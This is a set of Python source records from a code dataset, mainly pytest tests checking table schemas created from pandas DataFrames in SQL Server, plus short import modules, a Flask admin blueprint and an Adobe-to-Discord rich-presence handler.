columns = {"A": "TINYINT", "B": "VARCHAR(5)", "C": "FLOAT"}
primary_key_column = ["A", "B"]
not_nullable = "B"
sql.create.table(
table_name,
columns,
not_nullable=not_nullable,
primary_key_column=primary_key_column,
)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 3
assert all(schema.index == ["A", "B", "C"])
assert all(schema["sql_type"] == ["tinyint", "varchar", "float"])
assert all(schema["is_nullable"] == [False, False, True])
assert all(schema["ss_is_identity"] == False)
assert schema["pk_seq"].equals(
pd.Series([1, 2, pd.NA], index=["A", "B", "C"], dtype="Int64")
)
assert all(schema["pk_name"].isna() == [False, False, True])
assert all(schema["pandas_type"] == ["UInt8", "string", "float64"])
assert all(
schema["odbc_type"]
== [pyodbc.SQL_TINYINT, pyodbc.SQL_VARCHAR, pyodbc.SQL_FLOAT]
)
assert all(schema["odbc_size"] == [1, 0, 8])
assert all(schema["odbc_precision"] == [0, 0, 53])
def test_table_pk_input_error(sql):
with pytest.raises(ValueError):
table_name = "##test_table_pk_input_error"
columns = {"A": "TINYINT", "B": "VARCHAR(100)", "C": "DECIMAL(5,2)"}
primary_key_column = "A"
not_nullable = "B"
sql.create.table(
table_name,
columns,
not_nullable=not_nullable,
primary_key_column=primary_key_column,
sql_primary_key=True,
)
def test_table_sqlpk(sql):
table_name = "##test_table_sqlpk"
columns = {"A": "VARCHAR"}
sql.create.table(table_name, columns, sql_primary_key=True)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 2
assert all(schema.index == ["_pk", "A"])
assert all(schema["sql_type"] == ["int identity", "varchar"])
assert all(schema["is_nullable"] == [False, True])
assert all(schema["ss_is_identity"] == [True, False])
assert schema["pk_seq"].equals(
pd.Series([1, pd.NA], index=["_pk", "A"], dtype="Int64")
)
assert all(schema["pk_name"].isna() == [False, True])
assert all(schema["pandas_type"] == ["Int32", "string"])
assert all(schema["odbc_type"] == [pyodbc.SQL_INTEGER, pyodbc.SQL_VARCHAR])
assert all(schema["odbc_size"] == [4, 0])
assert all(schema["odbc_precision"] == [0, 0])
def test_table_from_dataframe_simple(sql):
table_name = "##test_table_from_dataframe_simple"
dataframe = pd.DataFrame({"ColumnA": [1]})
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(table_name, dataframe)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 1
assert all(schema.index == "ColumnA")
assert all(schema["sql_type"] == "tinyint")
assert all(schema["is_nullable"] == False)
assert all(schema["ss_is_identity"] == False)
assert all(schema["pk_seq"].isna())
assert all(schema["pk_name"].isna())
assert all(schema["pandas_type"] == "UInt8")
assert all(schema["odbc_type"] == pyodbc.SQL_TINYINT)
assert all(schema["odbc_size"] == 1)
assert all(schema["odbc_precision"] == 0)
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result.equals(dataframe)
def test_table_from_dataframe_datestr(sql):
table_name = "##test_table_from_dataframe_datestr"
dataframe = pd.DataFrame({"ColumnA": ["06/22/2021"]})
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create_meta.table_from_dataframe(table_name, dataframe)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame({
'column_name': pd.Series(['ColumnA','_time_insert']),
'sql_type': pd.Series(['date','datetime2'], dtype='string'),
'is_nullable': pd.Series([False, True]),
'ss_is_identity': pd.Series([False, False]),
'pk_seq': pd.Series([None, None], dtype='Int64'),
'pk_name': pd.Series([None, None], dtype='string'),
'pandas_type': pd.Series(['datetime64[ns]', 'datetime64[ns]'], dtype='string'),
'odbc_type': pd.Series([pyodbc.SQL_TYPE_DATE, pyodbc.SQL_TYPE_TIMESTAMP], dtype='int64'),
'odbc_size': pd.Series([10, 27], dtype='int64'),
'odbc_precision': pd.Series([0, 7], dtype='int64'),
}).set_index(keys='column_name')
assert schema[expected.columns].equals(expected)
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_errorpk(sql, sample):
with pytest.raises(ValueError):
table_name = "##test_table_from_dataframe_nopk"
sql.create.table_from_dataframe(table_name, sample, primary_key="ColumnName")
def test_table_from_dataframe_nopk(sql, sample):
table_name = "##test_table_from_dataframe_nopk"
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, sample.copy(), primary_key=None
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame(
{
"column_name": pd.Series(
[
"_varchar",
"_tinyint",
"_smallint",
"_int",
"_bigint",
"_float",
"_time",
"_datetime",
"_empty",
],
dtype="string",
),
"sql_type": pd.Series(
[
"varchar",
"tinyint",
"smallint",
"int",
"bigint",
"float",
"time",
"datetime2",
"nvarchar",
],
dtype="string",
),
"is_nullable": pd.Series(
[True, True, False, False, True, False, False, True, True], dtype="bool"
),
"ss_is_identity": pd.Series([False] * 9, dtype="bool"),
"pk_seq": pd.Series([pd.NA] * 9, dtype="Int64"),
"pk_name": pd.Series([pd.NA] * 9, dtype="string"),
"pandas_type": pd.Series(
[
"string",
"UInt8",
"Int16",
"Int32",
"Int64",
"float64",
"timedelta64[ns]",
"datetime64[ns]",
"string",
],
dtype="string",
),
"odbc_type": pd.Series(
[
pyodbc.SQL_VARCHAR,
pyodbc.SQL_TINYINT,
pyodbc.SQL_SMALLINT,
pyodbc.SQL_INTEGER,
pyodbc.SQL_BIGINT,
pyodbc.SQL_FLOAT,
pyodbc.SQL_SS_TIME2,
pyodbc.SQL_TYPE_TIMESTAMP,
pyodbc.SQL_WVARCHAR,
],
dtype="int64",
),
"odbc_size": pd.Series([0, 1, 2, 4, 8, 8, 16, 27, 0], dtype="int64"),
"odbc_precision": pd.Series([0, 0, 0, 0, 0, 53, 7, 7, 0], dtype="int64"),
}
).set_index(keys="column_name")
assert schema[expected.columns].equals(expected.loc[schema.index])
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_sqlpk(sql, sample):
table_name = "##test_table_from_dataframe_sqlpk"
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, sample.copy(), primary_key="sql"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame(
{
"column_name": pd.Series(
[
"_pk",
"_varchar",
"_tinyint",
"_smallint",
"_int",
"_bigint",
"_float",
"_time",
"_datetime",
"_empty",
],
dtype="string",
),
"sql_type": pd.Series(
[
"int identity",
"varchar",
"tinyint",
"smallint",
"int",
"bigint",
"float",
"time",
"datetime2",
"nvarchar",
],
dtype="string",
),
"is_nullable": pd.Series(
[False, True, True, False, False, True, False, False, True, True],
dtype="bool",
),
"ss_is_identity": pd.Series([True] + [False] * 9, dtype="bool"),
"pk_seq": pd.Series([1] + [pd.NA] * 9, dtype="Int64"),
"pandas_type": pd.Series(
[
"Int32",
"string",
"UInt8",
"Int16",
"Int32",
"Int64",
"float64",
"timedelta64[ns]",
"datetime64[ns]",
"string",
],
dtype="string",
),
"odbc_type": pd.Series(
[
pyodbc.SQL_INTEGER,
pyodbc.SQL_VARCHAR,
pyodbc.SQL_TINYINT,
pyodbc.SQL_SMALLINT,
pyodbc.SQL_INTEGER,
pyodbc.SQL_BIGINT,
pyodbc.SQL_FLOAT,
pyodbc.SQL_SS_TIME2,
pyodbc.SQL_TYPE_TIMESTAMP,
pyodbc.SQL_WVARCHAR,
],
dtype="int64",
),
"odbc_size": pd.Series([4, 0, 1, 2, 4, 8, 8, 16, 27, 0], dtype="int64"),
"odbc_precision": pd.Series([0, 0, 0, 0, 0, 0, 53, 7, 7, 0], dtype="int64"),
}
).set_index(keys="column_name")
assert schema[expected.columns].equals(expected.loc[schema.index])
assert pd.notna(schema.at["_pk", "pk_name"])
assert schema.loc[schema.index != "_pk", "pk_name"].isna().all()
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
result = result.reset_index(drop=True)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_indexpk_unnamed(sql, sample):
table_name = "##test_table_from_dataframe_indexpk_unnamed"
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, sample.copy(), primary_key="index"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame(
{
"column_name": pd.Series(
[
"_index",
"_varchar",
"_tinyint",
"_smallint",
"_int",
"_bigint",
"_float",
"_time",
"_datetime",
"_empty",
],
dtype="string",
),
"sql_type": pd.Series(
[
"tinyint",
"varchar",
"tinyint",
"smallint",
"int",
"bigint",
"float",
"time",
"datetime2",
"nvarchar",
],
dtype="string",
),
"is_nullable": pd.Series(
[False, True, True, False, False, True, False, False, True, True],
dtype="bool",
),
"ss_is_identity": pd.Series([False] * 10, dtype="bool"),
"pk_seq": pd.Series([1] + [pd.NA] * 9, dtype="Int64"),
"pandas_type": pd.Series(
[
"UInt8",
"string",
"UInt8",
"Int16",
"Int32",
"Int64",
"float64",
"timedelta64[ns]",
"datetime64[ns]",
"string",
],
dtype="string",
),
"odbc_type": pd.Series(
[
pyodbc.SQL_TINYINT,
pyodbc.SQL_VARCHAR,
pyodbc.SQL_TINYINT,
pyodbc.SQL_SMALLINT,
pyodbc.SQL_INTEGER,
pyodbc.SQL_BIGINT,
pyodbc.SQL_FLOAT,
pyodbc.SQL_SS_TIME2,
pyodbc.SQL_TYPE_TIMESTAMP,
pyodbc.SQL_WVARCHAR,
],
dtype="int64",
),
"odbc_size": pd.Series([1, 0, 1, 2, 4, 8, 8, 16, 27, 0], dtype="int64"),
"odbc_precision": pd.Series([0, 0, 0, 0, 0, 0, 53, 7, 7, 0], dtype="int64"),
}
).set_index(keys="column_name")
assert schema[expected.columns].equals(expected.loc[schema.index])
assert pd.notna(schema.at["_index", "pk_name"])
assert schema.loc[schema.index != "_index", "pk_name"].isna().all()
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_indexpk_named(sql, sample):
table_name = "##test_table_from_dataframe_indexpk_named"
sample.index.name = "NamedIndex"
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, sample.copy(), primary_key="index"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame(
{
"column_name": pd.Series(
[
"NamedIndex",
"_varchar",
"_tinyint",
"_smallint",
"_int",
"_bigint",
"_float",
"_time",
"_datetime",
"_empty",
],
dtype="string",
),
"sql_type": pd.Series(
[
"tinyint",
"varchar",
"tinyint",
"smallint",
"int",
"bigint",
"float",
"time",
"datetime2",
"nvarchar",
],
dtype="string",
),
"is_nullable": pd.Series(
[False, True, True, False, False, True, False, False, True, True],
dtype="bool",
),
"ss_is_identity": pd.Series([False] * 10, dtype="bool"),
"pk_seq": pd.Series([1] + [pd.NA] * 9, dtype="Int64"),
"pandas_type": pd.Series(
[
"UInt8",
"string",
"UInt8",
"Int16",
"Int32",
"Int64",
"float64",
"timedelta64[ns]",
"datetime64[ns]",
"string",
],
dtype="string",
),
"odbc_type": pd.Series(
[
pyodbc.SQL_TINYINT,
pyodbc.SQL_VARCHAR,
pyodbc.SQL_TINYINT,
pyodbc.SQL_SMALLINT,
pyodbc.SQL_INTEGER,
pyodbc.SQL_BIGINT,
pyodbc.SQL_FLOAT,
pyodbc.SQL_SS_TIME2,
pyodbc.SQL_TYPE_TIMESTAMP,
pyodbc.SQL_WVARCHAR,
],
dtype="int64",
),
"odbc_size": pd.Series([1, 0, 1, 2, 4, 8, 8, 16, 27, 0], dtype="int64"),
"odbc_precision": pd.Series([0, 0, 0, 0, 0, 0, 53, 7, 7, 0], dtype="int64"),
}
).set_index(keys="column_name")
assert schema[expected.columns].equals(expected.loc[schema.index])
assert pd.notna(schema.at["NamedIndex", "pk_name"])
assert schema.loc[schema.index != "NamedIndex", "pk_name"].isna().all()
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_inferpk_integer(sql):
table_name = "##test_table_from_dataframe_inferpk_integer"
dataframe = pd.DataFrame(
{
"_varchar1": ["a", "b", "c", "d", "e"],
"_varchar2": ["aa", "b", "c", "d", "e"],
"_tinyint": [None, 2, 3, 4, 5],
"_smallint": [265, 2, 6, 4, 5],
"_int": [32768, 2, 3, 4, 5],
"_float1": [1.1111, 2, 3, 4, 5],
"_float2": [1.1111, 2, 3, 4, 6],
}
)
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, dataframe, primary_key="infer"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert schema.at["_smallint", "pk_seq"] == 1
assert all(schema.loc[schema.index != "_smallint", "pk_seq"].isna())
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe.sort_index())
def test_table_from_dataframe_inferpk_string(sql):
table_name = "##test_table_from_dataframe_inferpk_string"
dataframe = pd.DataFrame(
{
"_varchar1": ["a", "b", "c", "d", "e"],
"_varchar2": ["aa", "b", "c", "d", "e"],
}
)
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, dataframe, primary_key="infer"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert schema.at["_varchar1", "pk_seq"] == 1
assert all(schema.loc[schema.index != "_varchar1", "pk_seq"].isna())
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_inferpk_none(sql):
table_name = "##test_table_from_dataframe_inferpk_none"
dataframe = pd.DataFrame(
{
"_varchar1": [None, "b", "c", "d", "e"],
"_varchar2": [None, "b", "c", "d", "e"],
}
)
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, dataframe, primary_key="infer"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert all(schema["pk_seq"].isna())
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_composite_pk(sql):
table_name = "##test_table_from_dataframe_composite_pk"
dataframe = pd.DataFrame(
{"ColumnA": [1, 2], "ColumnB": ["a", "b"], "ColumnC": [3, 4]}
)
dataframe = dataframe.set_index(keys=["ColumnA", "ColumnB"])
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, dataframe, primary_key="index"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert schema.at["ColumnA", "pk_seq"] == 1
assert schema.at["ColumnB", "pk_seq"] == 2
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
| 36.005658 | 97 | 0.530013 | 2,686 | 25,456 | 4.806776 | 0.074832 | 0.040431 | 0.05809 | 0.037487 | 0.887848 | 0.865618 | 0.811401 | 0.774301 | 0.719851 | 0.696383 | 0 | 0.025549 | 0.33116 | 25,456 | 706 | 98 | 36.056657 | 0.732762 | 0.004871 | 0 | 0.673667 | 0 | 0 | 0.149885 | 0.01844 | 0 | 0 | 0 | 0 | 0.182553 | 1 | 0.03231 | false | 0 | 0.011309 | 0 | 0.04685 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3a5687db17759bdb8914e8b67c3734cdd9bc35b8 | 667 | py | Python | src/spaceone/inventory/service/__init__.py | xellos00/inventory | e2831f2f09b5b72623f735a186264987d41954ab | [
"Apache-2.0"
] | 9 | 2020-06-04T23:01:38.000Z | 2021-06-03T03:38:59.000Z | src/spaceone/inventory/service/__init__.py | xellos00/inventory | e2831f2f09b5b72623f735a186264987d41954ab | [
"Apache-2.0"
] | 10 | 2020-08-20T01:34:30.000Z | 2022-03-14T04:59:48.000Z | src/spaceone/inventory/service/__init__.py | xellos00/inventory | e2831f2f09b5b72623f735a186264987d41954ab | [
"Apache-2.0"
] | 9 | 2020-06-08T22:03:02.000Z | 2021-12-06T06:12:30.000Z | from spaceone.inventory.service.region_service import RegionService
from spaceone.inventory.service.server_service import ServerService
from spaceone.inventory.service.collector_service import CollectorService
from spaceone.inventory.service.job_service import JobService
from spaceone.inventory.service.job_task_service import JobTaskService
from spaceone.inventory.service.cloud_service_type_service import CloudServiceTypeService
from spaceone.inventory.service.cloud_service_service import CloudServiceService
from spaceone.inventory.service.cleanup_service import CleanupService
from spaceone.inventory.service.resource_group_service import ResourceGroupService
| 66.7 | 89 | 0.905547 | 77 | 667 | 7.662338 | 0.311688 | 0.183051 | 0.320339 | 0.427119 | 0.240678 | 0.135593 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053973 | 667 | 9 | 90 | 74.111111 | 0.935024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
28b3b666936fc41c4051c7821a66cb8922aa6144 | 45 | py | Python | droput_authentication/droput_auth/config/__init__.py | hosein-yousefii/DROPUT | 99a714f03a92b14228a3691ca6568ece0f0ea48c | [
"Apache-2.0"
] | 2 | 2022-03-17T08:08:07.000Z | 2022-03-17T21:38:54.000Z | droput_authentication/droput_auth/config/__init__.py | hosein-yousefii/DROPUT | 99a714f03a92b14228a3691ca6568ece0f0ea48c | [
"Apache-2.0"
] | null | null | null | droput_authentication/droput_auth/config/__init__.py | hosein-yousefii/DROPUT | 99a714f03a92b14228a3691ca6568ece0f0ea48c | [
"Apache-2.0"
] | null | null | null | from droput_auth.config.config import Config
| 22.5 | 44 | 0.866667 | 7 | 45 | 5.428571 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
28caf7771b7f75c0ee86fac9feba525e527bfa65 | 66 | py | Python | modes/left_cannon/code/left_cannon.py | GabeKnuth/STTNG | d9de356a72ca3850cc710e4c413a932450062a8a | [
"MIT"
] | null | null | null | modes/left_cannon/code/left_cannon.py | GabeKnuth/STTNG | d9de356a72ca3850cc710e4c413a932450062a8a | [
"MIT"
] | null | null | null | modes/left_cannon/code/left_cannon.py | GabeKnuth/STTNG | d9de356a72ca3850cc710e4c413a932450062a8a | [
"MIT"
] | null | null | null | from mpf.system.modes import Mode
class kickback(Mode):
pass
| 13.2 | 33 | 0.742424 | 10 | 66 | 4.9 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 66 | 4 | 34 | 16.5 | 0.907407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
e93dd2c9198db885f95278594ee42ae6c3e19265 | 74 | py | Python | src/utils/metadata/__init__.py | SecureThemAll/cb-repair | 3d1d4422e9a9ab459641e1ca759e3b73887d2950 | [
"MIT"
] | null | null | null | src/utils/metadata/__init__.py | SecureThemAll/cb-repair | 3d1d4422e9a9ab459641e1ca759e3b73887d2950 | [
"MIT"
] | null | null | null | src/utils/metadata/__init__.py | SecureThemAll/cb-repair | 3d1d4422e9a9ab459641e1ca759e3b73887d2950 | [
"MIT"
] | null | null | null | from .manifest import *
from .snippet import *
from .source_file import *
| 18.5 | 26 | 0.756757 | 10 | 74 | 5.5 | 0.6 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 74 | 3 | 27 | 24.666667 | 0.887097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3aa5de4a87d58d7334aaf29bf1e7f67e21c8098e | 21 | py | Python | reinvent-2019/rhythm-cloud/lib/ABElectronics_Python_Libraries/ADCPi/__init__.py | kienpham2000/aws-builders-fair-projects | 6c4075c0945a6318b217355a6fc663e35ffb9dba | [
"Apache-2.0"
] | 2 | 2019-12-17T03:38:38.000Z | 2021-05-28T06:23:58.000Z | reinvent-2019/rhythm-cloud/lib/ABElectronics_Python_Libraries/ADCPi/__init__.py | kienpham2000/aws-builders-fair-projects | 6c4075c0945a6318b217355a6fc663e35ffb9dba | [
"Apache-2.0"
] | 8 | 2021-05-09T06:05:46.000Z | 2022-03-02T09:53:20.000Z | reinvent-2019/rhythm-cloud/lib/ABElectronics_Python_Libraries/ADCPi/__init__.py | kienpham2000/aws-builders-fair-projects | 6c4075c0945a6318b217355a6fc663e35ffb9dba | [
"Apache-2.0"
] | 3 | 2020-09-30T18:46:59.000Z | 2020-10-21T21:20:26.000Z | from .ADCPi import *
| 10.5 | 20 | 0.714286 | 3 | 21 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 21 | 1 | 21 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3ac0b459b5fe63ea8165259c2b617c8546c0db91 | 3,444 | py | Python | handler.py | garrettsummerfi3ld/adobe-rpc | 5084a44d924573ffd9650f2e969d51d5bced486f | [
"MIT"
] | 1 | 2020-05-16T23:38:20.000Z | 2020-05-16T23:38:20.000Z | handler.py | garrettsummerfi3ld/adobe-rpc | 5084a44d924573ffd9650f2e969d51d5bced486f | [
"MIT"
] | null | null | null | handler.py | garrettsummerfi3ld/adobe-rpc | 5084a44d924573ffd9650f2e969d51d5bced486f | [
"MIT"
] | null | null | null | import sys
import logging
def get_rpc_update():
# Grabs data from applications
logging.debug("Checking OS...")
if sys.platform in ['Windows', 'win32', 'cygwin']:
# Windows data retrieval
try:
logging.debug("Importing Windows specific modules...")
from api.windows import get_title, get_process_info, get_status
app_info = get_process_info()
if app_info != None:
# Information to publically show to Discord
app_title = get_title(app_info['pid'])
app_state = get_status(app_info, app_title)
# Dictionary setup to return application info
rpc_update = {'state': app_state,
'small_image': app_info['smallImageKey'],
'large_image': app_info['largeImageKey'],
'large_text': app_info['largeText'],
'small_text': app_info['smallText'],
'details': app_info['largeText']}
# Returns data from processing the application data
return rpc_update
# If 'get_process_info()' doesn't find a proper 'processName' element, stop application
elif app_info is None:
logging.error("Unable to find process")
except ImportError:
logging.error(
"A required dependency was not found! Did you install all dependencies? Check the README.")
raise SystemExit(1)
except TypeError:
logging.error("No Adobe Applications running!")
elif sys.platform == 'darwin':
# macOS data retrieval
try:
logging.debug("Importing macOS specific modules...")
from api.macos import get_title, get_process_info, get_status
app_info = get_process_info()
if app_info is not None:
# Information to publicly show to Discord
app_title = get_title(app_info['pid'])
app_state = get_status(app_info, app_title)
# Dictionary setup to return application info
rpc_update = {'state': app_state,
'small_image': app_info['smallImageKey'],
'large_image': app_info['largeImageKey'],
'large_text': app_info['largeText'],
'small_text': app_info['smallText'],
'details': app_info['largeText']}
# Returns data from processing the application data
return rpc_update
# If 'get_process_info()' doesn't find a proper 'processName' element, stop application
elif app_info is None:
logging.error("Unable to find process")
except ImportError:
logging.error(
"A required dependency was not found! Did you install all dependencies? Check the README.")
raise SystemExit(1)
except TypeError:
logging.error("No Adobe Applications running!")
else:
logging.error("Unknown operating system! Exiting...")
logging.error("If you believe this is an error. Submit a bug report.")
raise SystemExit(0)
def exception_handler(exception, future):
logging.exception("Something bad happened. Printing stacktrace...") | 42 | 104 | 0.570557 | 360 | 3,444 | 5.283333 | 0.313889 | 0.073607 | 0.044164 | 0.033649 | 0.771819 | 0.771819 | 0.732913 | 0.732913 | 0.732913 | 0.732913 | 0 | 0.003095 | 0.343206 | 3,444 | 82 | 105 | 42 | 0.837754 | 0.149826 | 0 | 0.714286 | 0 | 0 | 0.257456 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.142857 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aae805c822d00cc4905f52f3ee9996134cc8d830 | 73 | py | Python | chosen/forms.py | TBP-IT/django-chosen | a64821251aabdbf95cdb8102bedf1a5574ee29d6 | [
"BSD-2-Clause"
] | null | null | null | chosen/forms.py | TBP-IT/django-chosen | a64821251aabdbf95cdb8102bedf1a5574ee29d6 | [
"BSD-2-Clause"
] | null | null | null | chosen/forms.py | TBP-IT/django-chosen | a64821251aabdbf95cdb8102bedf1a5574ee29d6 | [
"BSD-2-Clause"
] | null | null | null | # flake8: noqa
from chosen.fields import *
from chosen.widgets import *
| 14.6 | 28 | 0.753425 | 10 | 73 | 5.5 | 0.7 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016393 | 0.164384 | 73 | 4 | 29 | 18.25 | 0.885246 | 0.164384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aaf7cca4331195b9cf218be816102104f6471918 | 132 | py | Python | app/admin/__init__.py | SuYehTarn/CS651-Group8-Feedback_Forum | d1163442aea81214c4dfa8de1d353ec719bfa7ab | [
"MIT"
] | null | null | null | app/admin/__init__.py | SuYehTarn/CS651-Group8-Feedback_Forum | d1163442aea81214c4dfa8de1d353ec719bfa7ab | [
"MIT"
] | null | null | null | app/admin/__init__.py | SuYehTarn/CS651-Group8-Feedback_Forum | d1163442aea81214c4dfa8de1d353ec719bfa7ab | [
"MIT"
] | null | null | null | """Module of the Admin blueprint
"""
from flask import Blueprint
admin = Blueprint('admin', __name__)
from app.admin import views
